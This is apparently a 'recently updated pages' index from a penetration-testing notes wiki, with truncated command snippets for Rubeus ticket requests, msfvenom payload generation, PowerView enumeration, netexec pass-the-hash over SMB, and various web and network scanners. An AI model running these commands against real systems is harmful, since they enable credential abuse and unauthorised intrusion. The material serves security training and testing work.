Recently Updated Pages
rubeus
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt
msf
Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl h...
powerview
1. Enumerate common names Get-DomainComputer | select cn
netexec
Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP ...
gobuster
Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web...
nikto
Basic usage nikto -host http://TARGET_IP -p PORT
fuff
Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET...
wpscan
Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p ...
nmap
Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 targe...
autorecon
Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the belo...